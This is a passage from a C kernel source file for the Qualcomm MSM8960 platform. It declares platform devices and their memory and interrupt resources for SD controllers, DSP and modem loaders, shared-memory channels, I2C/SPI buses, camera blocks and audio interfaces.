.flags = IORESOURCE_MEM,
},
{
.name = "bam_irq",
.start = SDC4_BAM_IRQ,
.end = SDC4_BAM_IRQ,
.flags = IORESOURCE_IRQ,
},
#endif
};
static struct resource resources_sdc5[] = {
{
.name = "core_mem",
.flags = IORESOURCE_MEM,
.start = MSM_SDC5_BASE,
.end = MSM_SDC5_DML_BASE - 1,
},
{
.name = "core_irq",
.flags = IORESOURCE_IRQ,
.start = SDC5_IRQ_0,
.end = SDC5_IRQ_0
},
#ifdef CONFIG_MMC_MSM_SPS_SUPPORT
{
.name = "dml_mem",
.start = MSM_SDC5_DML_BASE,
.end = MSM_SDC5_BAM_BASE - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "bam_mem",
.start = MSM_SDC5_BAM_BASE,
.end = MSM_SDC5_BAM_BASE + (2 * SZ_4K) - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "bam_irq",
.start = SDC5_BAM_IRQ,
.end = SDC5_BAM_IRQ,
.flags = IORESOURCE_IRQ,
},
#endif
};
struct platform_device msm_device_sdc1 = {
.name = "msm_sdcc",
.id = 1,
.num_resources = ARRAY_SIZE(resources_sdc1),
.resource = resources_sdc1,
.dev = {
.coherent_dma_mask = 0xffffffff,
},
};
struct platform_device msm_device_sdc2 = {
.name = "msm_sdcc",
.id = 2,
.num_resources = ARRAY_SIZE(resources_sdc2),
.resource = resources_sdc2,
.dev = {
.coherent_dma_mask = 0xffffffff,
},
};
struct platform_device msm_device_sdc3 = {
.name = "msm_sdcc",
.id = 3,
.num_resources = ARRAY_SIZE(resources_sdc3),
.resource = resources_sdc3,
.dev = {
.coherent_dma_mask = 0xffffffff,
},
};
struct platform_device msm_device_sdc4 = {
.name = "msm_sdcc",
.id = 4,
.num_resources = ARRAY_SIZE(resources_sdc4),
.resource = resources_sdc4,
.dev = {
.coherent_dma_mask = 0xffffffff,
},
};
struct platform_device msm_device_sdc5 = {
.name = "msm_sdcc",
.id = 5,
.num_resources = ARRAY_SIZE(resources_sdc5),
.resource = resources_sdc5,
.dev = {
.coherent_dma_mask = 0xffffffff,
},
};
#define MSM_LPASS_QDSP6SS_PHYS 0x28800000
#define SFAB_LPASS_Q6_ACLK_CTL (MSM_CLK_CTL_BASE + 0x23A0)
static struct resource msm_8960_q6_lpass_resources[] = {
{
.start = MSM_LPASS_QDSP6SS_PHYS,
.end = MSM_LPASS_QDSP6SS_PHYS + SZ_256 - 1,
.flags = IORESOURCE_MEM,
},
};
static struct pil_q6v4_pdata msm_8960_q6_lpass_data = {
.strap_tcm_base = 0x01460000,
.strap_ahb_upper = 0x00290000,
.strap_ahb_lower = 0x00000280,
.aclk_reg = SFAB_LPASS_Q6_ACLK_CTL,
.name = "q6",
.pas_id = PAS_Q6,
.bus_port = MSM_BUS_MASTER_LPASS_PROC,
};
struct platform_device msm_8960_q6_lpass = {
.name = "pil_qdsp6v4",
.id = 0,
.num_resources = ARRAY_SIZE(msm_8960_q6_lpass_resources),
.resource = msm_8960_q6_lpass_resources,
.dev.platform_data = &msm_8960_q6_lpass_data,
};
#define MSM_MSS_ENABLE_PHYS 0x08B00000
#define MSM_FW_QDSP6SS_PHYS 0x08800000
#define MSS_Q6FW_JTAG_CLK_CTL (MSM_CLK_CTL_BASE + 0x2C6C)
#define SFAB_MSS_Q6_FW_ACLK_CTL (MSM_CLK_CTL_BASE + 0x2044)
static struct resource msm_8960_q6_mss_fw_resources[] = {
{
.start = MSM_FW_QDSP6SS_PHYS,
.end = MSM_FW_QDSP6SS_PHYS + SZ_256 - 1,
.flags = IORESOURCE_MEM,
},
{
.start = MSM_MSS_ENABLE_PHYS,
.end = MSM_MSS_ENABLE_PHYS + 4 - 1,
.flags = IORESOURCE_MEM,
},
};
static struct pil_q6v4_pdata msm_8960_q6_mss_fw_data = {
.strap_tcm_base = 0x00400000,
.strap_ahb_upper = 0x00090000,
.strap_ahb_lower = 0x00000080,
.aclk_reg = SFAB_MSS_Q6_FW_ACLK_CTL,
.jtag_clk_reg = MSS_Q6FW_JTAG_CLK_CTL,
.name = "modem_fw",
.depends = "q6",
.pas_id = PAS_MODEM_FW,
.bus_port = MSM_BUS_MASTER_MSS_FW_PROC,
};
struct platform_device msm_8960_q6_mss_fw = {
.name = "pil_qdsp6v4",
.id = 1,
.num_resources = ARRAY_SIZE(msm_8960_q6_mss_fw_resources),
.resource = msm_8960_q6_mss_fw_resources,
.dev.platform_data = &msm_8960_q6_mss_fw_data,
};
#define MSM_SW_QDSP6SS_PHYS 0x08900000
#define SFAB_MSS_Q6_SW_ACLK_CTL (MSM_CLK_CTL_BASE + 0x2040)
#define MSS_Q6SW_JTAG_CLK_CTL (MSM_CLK_CTL_BASE + 0x2C68)
static struct resource msm_8960_q6_mss_sw_resources[] = {
{
.start = MSM_SW_QDSP6SS_PHYS,
.end = MSM_SW_QDSP6SS_PHYS + SZ_256 - 1,
.flags = IORESOURCE_MEM,
},
{
.start = MSM_MSS_ENABLE_PHYS,
.end = MSM_MSS_ENABLE_PHYS + 4 - 1,
.flags = IORESOURCE_MEM,
},
};
static struct pil_q6v4_pdata msm_8960_q6_mss_sw_data = {
.strap_tcm_base = 0x00420000,
.strap_ahb_upper = 0x00090000,
.strap_ahb_lower = 0x00000080,
.aclk_reg = SFAB_MSS_Q6_SW_ACLK_CTL,
.jtag_clk_reg = MSS_Q6SW_JTAG_CLK_CTL,
.name = "modem",
.depends = "modem_fw",
.pas_id = PAS_MODEM_SW,
.bus_port = MSM_BUS_MASTER_MSS_SW_PROC,
};
struct platform_device msm_8960_q6_mss_sw = {
.name = "pil_qdsp6v4",
.id = 2,
.num_resources = ARRAY_SIZE(msm_8960_q6_mss_sw_resources),
.resource = msm_8960_q6_mss_sw_resources,
.dev.platform_data = &msm_8960_q6_mss_sw_data,
};
static struct resource msm_8960_riva_resources[] = {
{
.start = 0x03204000,
.end = 0x03204000 + SZ_256 - 1,
.flags = IORESOURCE_MEM,
},
};
struct platform_device msm_8960_riva = {
.name = "pil_riva",
.id = -1,
.num_resources = ARRAY_SIZE(msm_8960_riva_resources),
.resource = msm_8960_riva_resources,
};
struct platform_device msm_pil_tzapps = {
.name = "pil_tzapps",
.id = -1,
};
struct platform_device msm_pil_dsps = {
.name = "pil_dsps",
.id = -1,
.dev.platform_data = "dsps",
};
struct platform_device msm_pil_vidc = {
.name = "pil_vidc",
.id = -1,
};
static struct resource smd_resource[] = {
{
.name = "a9_m2a_0",
.start = INT_A9_M2A_0,
.flags = IORESOURCE_IRQ,
},
{
.name = "a9_m2a_5",
.start = INT_A9_M2A_5,
.flags = IORESOURCE_IRQ,
},
{
.name = "adsp_a11",
.start = INT_ADSP_A11,
.flags = IORESOURCE_IRQ,
},
{
.name = "adsp_a11_smsm",
.start = INT_ADSP_A11_SMSM,
.flags = IORESOURCE_IRQ,
},
{
.name = "dsps_a11",
.start = INT_DSPS_A11,
.flags = IORESOURCE_IRQ,
},
{
.name = "dsps_a11_smsm",
.start = INT_DSPS_A11_SMSM,
.flags = IORESOURCE_IRQ,
},
{
.name = "wcnss_a11",
.start = INT_WCNSS_A11,
.flags = IORESOURCE_IRQ,
},
{
.name = "wcnss_a11_smsm",
.start = INT_WCNSS_A11_SMSM,
.flags = IORESOURCE_IRQ,
},
};
static struct smd_subsystem_config smd_config_list[] = {
{
.irq_config_id = SMD_MODEM,
.subsys_name = "modem",
.edge = SMD_APPS_MODEM,
.smd_int.irq_name = "a9_m2a_0",
.smd_int.flags = IRQF_TRIGGER_RISING,
.smd_int.irq_id = -1,
.smd_int.device_name = "smd_dev",
.smd_int.dev_id = 0,
.smd_int.out_bit_pos = 1 << 3,
.smd_int.out_base = (void __iomem *)MSM_APCS_GCC_BASE,
.smd_int.out_offset = 0x8,
.smsm_int.irq_name = "a9_m2a_5",
.smsm_int.flags = IRQF_TRIGGER_RISING,
.smsm_int.irq_id = -1,
.smsm_int.device_name = "smd_smsm",
.smsm_int.dev_id = 0,
.smsm_int.out_bit_pos = 1 << 4,
.smsm_int.out_base = (void __iomem *)MSM_APCS_GCC_BASE,
.smsm_int.out_offset = 0x8,
},
{
.irq_config_id = SMD_Q6,
.subsys_name = "q6",
.edge = SMD_APPS_QDSP,
.smd_int.irq_name = "adsp_a11",
.smd_int.flags = IRQF_TRIGGER_RISING,
.smd_int.irq_id = -1,
.smd_int.device_name = "smd_dev",
.smd_int.dev_id = 0,
.smd_int.out_bit_pos = 1 << 15,
.smd_int.out_base = (void __iomem *)MSM_APCS_GCC_BASE,
.smd_int.out_offset = 0x8,
.smsm_int.irq_name = "adsp_a11_smsm",
.smsm_int.flags = IRQF_TRIGGER_RISING,
.smsm_int.irq_id = -1,
.smsm_int.device_name = "smd_smsm",
.smsm_int.dev_id = 0,
.smsm_int.out_bit_pos = 1 << 14,
.smsm_int.out_base = (void __iomem *)MSM_APCS_GCC_BASE,
.smsm_int.out_offset = 0x8,
},
{
.irq_config_id = SMD_DSPS,
.subsys_name = "dsps",
.edge = SMD_APPS_DSPS,
.smd_int.irq_name = "dsps_a11",
.smd_int.flags = IRQF_TRIGGER_RISING,
.smd_int.irq_id = -1,
.smd_int.device_name = "smd_dev",
.smd_int.dev_id = 0,
.smd_int.out_bit_pos = 1,
.smd_int.out_base = (void __iomem *)MSM_SIC_NON_SECURE_BASE,
.smd_int.out_offset = 0x4080,
.smsm_int.irq_name = "dsps_a11_smsm",
.smsm_int.flags = IRQF_TRIGGER_RISING,
.smsm_int.irq_id = -1,
.smsm_int.device_name = "smd_smsm",
.smsm_int.dev_id = 0,
.smsm_int.out_bit_pos = 1,
.smsm_int.out_base = (void __iomem *)MSM_SIC_NON_SECURE_BASE,
.smsm_int.out_offset = 0x4094,
},
{
.irq_config_id = SMD_WCNSS,
.subsys_name = "wcnss",
.edge = SMD_APPS_WCNSS,
.smd_int.irq_name = "wcnss_a11",
.smd_int.flags = IRQF_TRIGGER_RISING,
.smd_int.irq_id = -1,
.smd_int.device_name = "smd_dev",
.smd_int.dev_id = 0,
.smd_int.out_bit_pos = 1 << 25,
.smd_int.out_base = (void __iomem *)MSM_APCS_GCC_BASE,
.smd_int.out_offset = 0x8,
.smsm_int.irq_name = "wcnss_a11_smsm",
.smsm_int.flags = IRQF_TRIGGER_RISING,
.smsm_int.irq_id = -1,
.smsm_int.device_name = "smd_smsm",
.smsm_int.dev_id = 0,
.smsm_int.out_bit_pos = 1 << 23,
.smsm_int.out_base = (void __iomem *)MSM_APCS_GCC_BASE,
.smsm_int.out_offset = 0x8,
},
};
static struct smd_subsystem_restart_config smd_ssr_config = {
.disable_smsm_reset_handshake = 1,
};
static struct smd_platform smd_platform_data = {
.num_ss_configs = ARRAY_SIZE(smd_config_list),
.smd_ss_configs = smd_config_list,
.smd_ssr_config = &smd_ssr_config,
};
struct platform_device msm_device_smd = {
.name = "msm_smd",
.id = -1,
.resource = smd_resource,
.num_resources = ARRAY_SIZE(smd_resource),
.dev = {
.platform_data = &smd_platform_data,
},
};
struct platform_device msm_device_bam_dmux = {
.name = "BAM_RMNT",
.id = -1,
};
static struct msm_pm_sleep_status_data msm_pm_slp_sts_data = {
.base_addr = MSM_ACC0_BASE + 0x08,
.cpu_offset = MSM_ACC1_BASE - MSM_ACC0_BASE,
.mask = 1UL << 13,
};
struct platform_device msm8960_cpu_slp_status = {
.name = "cpu_slp_status",
.id = -1,
.dev = {
.platform_data = &msm_pm_slp_sts_data,
},
};
static struct msm_watchdog_pdata msm_watchdog_pdata = {
.pet_time = 10000,
.bark_time = 11000,
.has_secure = true,
.base = MSM_TMR0_BASE + WDT0_OFFSET,
};
static struct resource msm_watchdog_resources[] = {
{
.start = WDT0_ACCSCSSNBARK_INT,
.end = WDT0_ACCSCSSNBARK_INT,
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm8960_device_watchdog = {
.name = "msm_watchdog",
.id = -1,
.dev = {
.platform_data = &msm_watchdog_pdata,
},
.num_resources = ARRAY_SIZE(msm_watchdog_resources),
.resource = msm_watchdog_resources,
};
static struct resource msm_dmov_resource[] = {
{
.start = ADM_0_SCSS_1_IRQ,
.flags = IORESOURCE_IRQ,
},
{
.start = 0x18320000,
.end = 0x18320000 + SZ_1M - 1,
.flags = IORESOURCE_MEM,
},
};
static struct msm_dmov_pdata msm_dmov_pdata = {
.sd = 1,
.sd_size = 0x800,
};
struct platform_device msm8960_device_dmov = {
.name = "msm_dmov",
.id = -1,
.resource = msm_dmov_resource,
.num_resources = ARRAY_SIZE(msm_dmov_resource),
.dev = {
.platform_data = &msm_dmov_pdata,
},
};
static struct platform_device *msm_sdcc_devices[] __initdata = {
&msm_device_sdc1,
&msm_device_sdc2,
&msm_device_sdc3,
&msm_device_sdc4,
&msm_device_sdc5,
};
int __init msm_add_sdcc(unsigned int controller, struct mmc_platform_data *plat)
{
struct platform_device *pdev;
if (controller < 1 || controller > 5)
return -EINVAL;
pdev = msm_sdcc_devices[controller-1];
pdev->dev.platform_data = plat;
return platform_device_register(pdev);
}
static struct resource resources_qup_i2c_gsbi4[] = {
{
.name = "gsbi_qup_i2c_addr",
.start = MSM_GSBI4_PHYS,
.end = MSM_GSBI4_PHYS + 4 - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "qup_phys_addr",
.start = MSM_GSBI4_QUP_PHYS,
.end = MSM_GSBI4_QUP_PHYS + MSM_QUP_SIZE - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "qup_err_intr",
.start = GSBI4_QUP_IRQ,
.end = GSBI4_QUP_IRQ,
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm8960_device_qup_i2c_gsbi4 = {
.name = "qup_i2c",
.id = 4,
.num_resources = ARRAY_SIZE(resources_qup_i2c_gsbi4),
.resource = resources_qup_i2c_gsbi4,
};
static struct resource resources_qup_i2c_gsbi3[] = {
{
.name = "gsbi_qup_i2c_addr",
.start = MSM_GSBI3_PHYS,
.end = MSM_GSBI3_PHYS + 4 - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "qup_phys_addr",
.start = MSM_GSBI3_QUP_PHYS,
.end = MSM_GSBI3_QUP_PHYS + MSM_QUP_SIZE - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "qup_err_intr",
.start = GSBI3_QUP_IRQ,
.end = GSBI3_QUP_IRQ,
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm8960_device_qup_i2c_gsbi3 = {
.name = "qup_i2c",
.id = 3,
.num_resources = ARRAY_SIZE(resources_qup_i2c_gsbi3),
.resource = resources_qup_i2c_gsbi3,
};
static struct resource resources_qup_i2c_gsbi9[] = {
{
.name = "gsbi_qup_i2c_addr",
.start = MSM_GSBI9_PHYS,
.end = MSM_GSBI9_PHYS + 4 - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "qup_phys_addr",
.start = MSM_GSBI9_QUP_PHYS,
.end = MSM_GSBI9_QUP_PHYS + MSM_QUP_SIZE - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "qup_err_intr",
.start = GSBI9_QUP_IRQ,
.end = GSBI9_QUP_IRQ,
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm8960_device_qup_i2c_gsbi9 = {
.name = "qup_i2c",
.id = 0,
.num_resources = ARRAY_SIZE(resources_qup_i2c_gsbi9),
.resource = resources_qup_i2c_gsbi9,
};
static struct resource resources_qup_i2c_gsbi10[] = {
{
.name = "gsbi_qup_i2c_addr",
.start = MSM_GSBI10_PHYS,
.end = MSM_GSBI10_PHYS + 4 - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "qup_phys_addr",
.start = MSM_GSBI10_QUP_PHYS,
.end = MSM_GSBI10_QUP_PHYS + MSM_QUP_SIZE - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "qup_err_intr",
.start = GSBI10_QUP_IRQ,
.end = GSBI10_QUP_IRQ,
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm8960_device_qup_i2c_gsbi10 = {
.name = "qup_i2c",
.id = 10,
.num_resources = ARRAY_SIZE(resources_qup_i2c_gsbi10),
.resource = resources_qup_i2c_gsbi10,
};
static struct resource resources_qup_i2c_gsbi12[] = {
{
.name = "gsbi_qup_i2c_addr",
.start = MSM_GSBI12_PHYS,
.end = MSM_GSBI12_PHYS + 4 - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "qup_phys_addr",
.start = MSM_GSBI12_QUP_PHYS,
.end = MSM_GSBI12_QUP_PHYS + MSM_QUP_SIZE - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "qup_err_intr",
.start = GSBI12_QUP_IRQ,
.end = GSBI12_QUP_IRQ,
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm8960_device_qup_i2c_gsbi12 = {
.name = "qup_i2c",
.id = 12,
.num_resources = ARRAY_SIZE(resources_qup_i2c_gsbi12),
.resource = resources_qup_i2c_gsbi12,
};
#ifdef CONFIG_MSM_CAMERA
static struct resource msm_cam_gsbi4_i2c_mux_resources[] = {
{
.name = "i2c_mux_rw",
.start = 0x008003E0,
.end = 0x008003E0 + SZ_8 - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "i2c_mux_ctl",
.start = 0x008020B8,
.end = 0x008020B8 + SZ_4 - 1,
.flags = IORESOURCE_MEM,
},
};
struct platform_device msm8960_device_i2c_mux_gsbi4 = {
.name = "msm_cam_i2c_mux",
.id = 0,
.resource = msm_cam_gsbi4_i2c_mux_resources,
.num_resources = ARRAY_SIZE(msm_cam_gsbi4_i2c_mux_resources),
};
static struct resource msm_csiphy0_resources[] = {
{
.name = "csiphy",
.start = 0x04800C00,
.end = 0x04800C00 + SZ_1K - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "csiphy",
.start = CSIPHY_4LN_IRQ,
.end = CSIPHY_4LN_IRQ,
.flags = IORESOURCE_IRQ,
},
};
static struct resource msm_csiphy1_resources[] = {
{
.name = "csiphy",
.start = 0x04801000,
.end = 0x04801000 + SZ_1K - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "csiphy",
.start = MSM8960_CSIPHY_2LN_IRQ,
.end = MSM8960_CSIPHY_2LN_IRQ,
.flags = IORESOURCE_IRQ,
},
};
static struct resource msm_csiphy2_resources[] = {
{
.name = "csiphy",
.start = 0x04801400,
.end = 0x04801400 + SZ_1K - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "csiphy",
.start = MSM8960_CSIPHY_2_2LN_IRQ,
.end = MSM8960_CSIPHY_2_2LN_IRQ,
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm8960_device_csiphy0 = {
.name = "msm_csiphy",
.id = 0,
.resource = msm_csiphy0_resources,
.num_resources = ARRAY_SIZE(msm_csiphy0_resources),
};
struct platform_device msm8960_device_csiphy1 = {
.name = "msm_csiphy",
.id = 1,
.resource = msm_csiphy1_resources,
.num_resources = ARRAY_SIZE(msm_csiphy1_resources),
};
struct platform_device msm8960_device_csiphy2 = {
.name = "msm_csiphy",
.id = 2,
.resource = msm_csiphy2_resources,
.num_resources = ARRAY_SIZE(msm_csiphy2_resources),
};
static struct resource msm_csid0_resources[] = {
{
.name = "csid",
.start = 0x04800000,
.end = 0x04800000 + SZ_1K - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "csid",
.start = CSI_0_IRQ,
.end = CSI_0_IRQ,
.flags = IORESOURCE_IRQ,
},
};
static struct resource msm_csid1_resources[] = {
{
.name = "csid",
.start = 0x04800400,
.end = 0x04800400 + SZ_1K - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "csid",
.start = CSI_1_IRQ,
.end = CSI_1_IRQ,
.flags = IORESOURCE_IRQ,
},
};
static struct resource msm_csid2_resources[] = {
{
.name = "csid",
.start = 0x04801800,
.end = 0x04801800 + SZ_1K - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "csid",
.start = CSI_2_IRQ,
.end = CSI_2_IRQ,
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm8960_device_csid0 = {
.name = "msm_csid",
.id = 0,
.resource = msm_csid0_resources,
.num_resources = ARRAY_SIZE(msm_csid0_resources),
};
struct platform_device msm8960_device_csid1 = {
.name = "msm_csid",
.id = 1,
.resource = msm_csid1_resources,
.num_resources = ARRAY_SIZE(msm_csid1_resources),
};
struct platform_device msm8960_device_csid2 = {
.name = "msm_csid",
.id = 2,
.resource = msm_csid2_resources,
.num_resources = ARRAY_SIZE(msm_csid2_resources),
};
struct resource msm_ispif_resources[] = {
{
.name = "ispif",
.start = 0x04800800,
.end = 0x04800800 + SZ_1K - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "ispif",
.start = ISPIF_IRQ,
.end = ISPIF_IRQ,
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm8960_device_ispif = {
.name = "msm_ispif",
.id = 0,
.resource = msm_ispif_resources,
.num_resources = ARRAY_SIZE(msm_ispif_resources),
};
static struct resource msm_vfe_resources[] = {
{
.name = "vfe32",
.start = 0x04500000,
.end = 0x04500000 + SZ_1M - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "vfe32",
.start = VFE_IRQ,
.end = VFE_IRQ,
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm8960_device_vfe = {
.name = "msm_vfe",
.id = 0,
.resource = msm_vfe_resources,
.num_resources = ARRAY_SIZE(msm_vfe_resources),
};
static struct resource msm_vpe_resources[] = {
{
.name = "vpe",
.start = 0x05300000,
.end = 0x05300000 + SZ_1M - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "vpe",
.start = VPE_IRQ,
.end = VPE_IRQ,
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm8960_device_vpe = {
.name = "msm_vpe",
.id = 0,
.resource = msm_vpe_resources,
.num_resources = ARRAY_SIZE(msm_vpe_resources),
};
#endif
#define MSM_TSIF0_PHYS (0x18200000)
#define MSM_TSIF1_PHYS (0x18201000)
#define MSM_TSIF_SIZE (0x200)
#define TSIF_0_CLK GPIO_CFG(75, 1, GPIO_CFG_INPUT, \
GPIO_CFG_PULL_DOWN, GPIO_CFG_2MA)
#define TSIF_0_EN GPIO_CFG(76, 1, GPIO_CFG_INPUT, \
GPIO_CFG_PULL_DOWN, GPIO_CFG_2MA)
#define TSIF_0_DATA GPIO_CFG(77, 1, GPIO_CFG_INPUT, \
GPIO_CFG_PULL_DOWN, GPIO_CFG_2MA)
#define TSIF_0_SYNC GPIO_CFG(82, 1, GPIO_CFG_INPUT, \
GPIO_CFG_PULL_DOWN, GPIO_CFG_2MA)
#define TSIF_1_CLK GPIO_CFG(79, 1, GPIO_CFG_INPUT, \
GPIO_CFG_PULL_DOWN, GPIO_CFG_2MA)
#define TSIF_1_EN GPIO_CFG(80, 1, GPIO_CFG_INPUT, \
GPIO_CFG_PULL_DOWN, GPIO_CFG_2MA)
#define TSIF_1_DATA GPIO_CFG(81, 1, GPIO_CFG_INPUT, \
GPIO_CFG_PULL_DOWN, GPIO_CFG_2MA)
#define TSIF_1_SYNC GPIO_CFG(78, 1, GPIO_CFG_INPUT, \
GPIO_CFG_PULL_DOWN, GPIO_CFG_2MA)
static const struct msm_gpio tsif0_gpios[] = {
{ .gpio_cfg = TSIF_0_CLK, .label = "tsif_clk", },
{ .gpio_cfg = TSIF_0_EN, .label = "tsif_en", },
{ .gpio_cfg = TSIF_0_DATA, .label = "tsif_data", },
{ .gpio_cfg = TSIF_0_SYNC, .label = "tsif_sync", },
};
static const struct msm_gpio tsif1_gpios[] = {
{ .gpio_cfg = TSIF_1_CLK, .label = "tsif_clk", },
{ .gpio_cfg = TSIF_1_EN, .label = "tsif_en", },
{ .gpio_cfg = TSIF_1_DATA, .label = "tsif_data", },
{ .gpio_cfg = TSIF_1_SYNC, .label = "tsif_sync", },
};
struct msm_tsif_platform_data tsif1_platform_data = {
.num_gpios = ARRAY_SIZE(tsif1_gpios),
.gpios = tsif1_gpios,
.tsif_pclk = "iface_clk",
.tsif_ref_clk = "ref_clk",
};
struct resource tsif1_resources[] = {
[0] = {
.flags = IORESOURCE_IRQ,
.start = TSIF2_IRQ,
.end = TSIF2_IRQ,
},
[1] = {
.flags = IORESOURCE_MEM,
.start = MSM_TSIF1_PHYS,
.end = MSM_TSIF1_PHYS + MSM_TSIF_SIZE - 1,
},
[2] = {
.flags = IORESOURCE_DMA,
.start = DMOV_TSIF_CHAN,
.end = DMOV_TSIF_CRCI,
},
};
struct msm_tsif_platform_data tsif0_platform_data = {
.num_gpios = ARRAY_SIZE(tsif0_gpios),
.gpios = tsif0_gpios,
.tsif_pclk = "iface_clk",
.tsif_ref_clk = "ref_clk",
};
struct resource tsif0_resources[] = {
[0] = {
.flags = IORESOURCE_IRQ,
.start = TSIF1_IRQ,
.end = TSIF1_IRQ,
},
[1] = {
.flags = IORESOURCE_MEM,
.start = MSM_TSIF0_PHYS,
.end = MSM_TSIF0_PHYS + MSM_TSIF_SIZE - 1,
},
[2] = {
.flags = IORESOURCE_DMA,
.start = DMOV_TSIF_CHAN,
.end = DMOV_TSIF_CRCI,
},
};
struct platform_device msm_device_tsif[2] = {
{
.name = "msm_tsif",
.id = 0,
.num_resources = ARRAY_SIZE(tsif0_resources),
.resource = tsif0_resources,
.dev = {
.platform_data = &tsif0_platform_data
},
},
{
.name = "msm_tsif",
.id = 1,
.num_resources = ARRAY_SIZE(tsif1_resources),
.resource = tsif1_resources,
.dev = {
.platform_data = &tsif1_platform_data
},
}
};
static struct resource resources_ssbi_pmic[] = {
{
.start = MSM_PMIC1_SSBI_CMD_PHYS,
.end = MSM_PMIC1_SSBI_CMD_PHYS + MSM_PMIC_SSBI_SIZE - 1,
.flags = IORESOURCE_MEM,
},
};
struct platform_device msm8960_device_ssbi_pmic = {
.name = "msm_ssbi",
.id = 0,
.resource = resources_ssbi_pmic,
.num_resources = ARRAY_SIZE(resources_ssbi_pmic),
};
static struct resource resources_qup_spi_gsbi1[] = {
{
.name = "spi_base",
.start = MSM_GSBI1_QUP_PHYS,
.end = MSM_GSBI1_QUP_PHYS + SZ_4K - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "gsbi_base",
.start = MSM_GSBI1_PHYS,
.end = MSM_GSBI1_PHYS + 4 - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "spi_irq_in",
.start = MSM8960_GSBI1_QUP_IRQ,
.end = MSM8960_GSBI1_QUP_IRQ,
.flags = IORESOURCE_IRQ,
},
{
.name = "spi_clk",
.start = 9,
.end = 9,
.flags = IORESOURCE_IO,
},
{
.name = "spi_miso",
.start = 7,
.end = 7,
.flags = IORESOURCE_IO,
},
{
.name = "spi_mosi",
.start = 6,
.end = 6,
.flags = IORESOURCE_IO,
},
{
.name = "spi_cs",
.start = 8,
.end = 8,
.flags = IORESOURCE_IO,
},
{
.name = "spi_cs1",
.start = 14,
.end = 14,
.flags = IORESOURCE_IO,
},
};
struct platform_device msm8960_device_qup_spi_gsbi1 = {
.name = "spi_qsd",
.id = 0,
.num_resources = ARRAY_SIZE(resources_qup_spi_gsbi1),
.resource = resources_qup_spi_gsbi1,
};
struct platform_device msm_pcm = {
.name = "msm-pcm-dsp",
.id = -1,
};
struct platform_device msm_multi_ch_pcm = {
.name = "msm-multi-ch-pcm-dsp",
.id = -1,
};
struct platform_device msm_lowlatency_pcm = {
.name = "msm-lowlatency-pcm-dsp",
.id = -1,
};
struct platform_device msm_pcm_routing = {
.name = "msm-pcm-routing",
.id = -1,
};
struct platform_device msm_cpudai0 = {
.name = "msm-dai-q6",
.id = 0x4000,
};
struct platform_device msm_cpudai1 = {
.name = "msm-dai-q6",
.id = 0x4001,
};
struct platform_device msm8960_cpudai_slimbus_2_rx = {
.name = "msm-dai-q6",
.id = 0x4004,
};
struct platform_device msm8960_cpudai_slimbus_2_tx = {
.name = "msm-dai-q6",
.id = 0x4005,
};
struct platform_device msm_cpudai_hdmi_rx = {
.name = "msm-dai-q6-hdmi",
.id = 8,
};
struct platform_device msm_cpudai_bt_rx = {
.name = "msm-dai-q6",
.id = 0x3000,
};
struct platform_device msm_cpudai_bt_tx = {
.name = "msm-dai-q6",
.id = 0x3001,
};
struct platform_device msm_cpudai_fm_rx = {
.name = "msm-dai-q6",
.id = 0x3004,
};
struct platform_device msm_cpudai_fm_tx = {
.name = "msm-dai-q6",
.id = 0x3005,
};
struct platform_device msm_cpudai_incall_music_rx = {
.name = "msm-dai-q6",
.id = 0x8005,
};
struct platform_device msm_cpudai_incall_record_rx = {
.name = "msm-dai-q6",
.id = 0x8004,
};
struct platform_device msm_cpudai_incall_record_tx = {
.name = "msm-dai-q6",
.id = 0x8003,
};
/*
* Machine specific data for AUX PCM Interface
* which the driver will be unware of.
*/
struct msm_dai_auxpcm_pdata auxpcm_pdata = {
.clk = "pcm_clk",
.mode_8k = {
.mode = AFE_PCM_CFG_MODE_PCM,
.sync = AFE_PCM_CFG_SYNC_INT,
.frame = AFE_PCM_CFG_FRM_32BPF,
.quant = AFE_PCM_CFG_QUANT_LINEAR_NOPAD,
.slot = 0,
.data = AFE_PCM_CFG_CDATAOE_MASTER,
.pcm_clk_rate = 256000,
},
.mode_16k = {
.mode = AFE_PCM_CFG_MODE_PCM,
.sync = AFE_PCM_CFG_SYNC_INT,
.frame = AFE_PCM_CFG_FRM_32BPF,
.quant = AFE_PCM_CFG_QUANT_LINEAR_NOPAD,
.slot = 0,
.data = AFE_PCM_CFG_CDATAOE_MASTER,
.pcm_clk_rate = 512000,
}
};
struct platform_device msm_cpudai_auxpcm_rx = {
.name = "msm-dai-q6",
.id = 2,
.dev = {
.platform_data = &auxpcm_pdata,
},
};
struct platform_device msm_cpudai_auxpcm_tx = {
.name = "msm-dai-q6",
.id = 3,
.dev = {
.platform_data = &auxpcm_pdata,
},
};
struct platform_device msm_cpu_fe = {
.name = "msm-dai-fe",
.id = -1,
};
struct platform_device msm_stub_codec = {
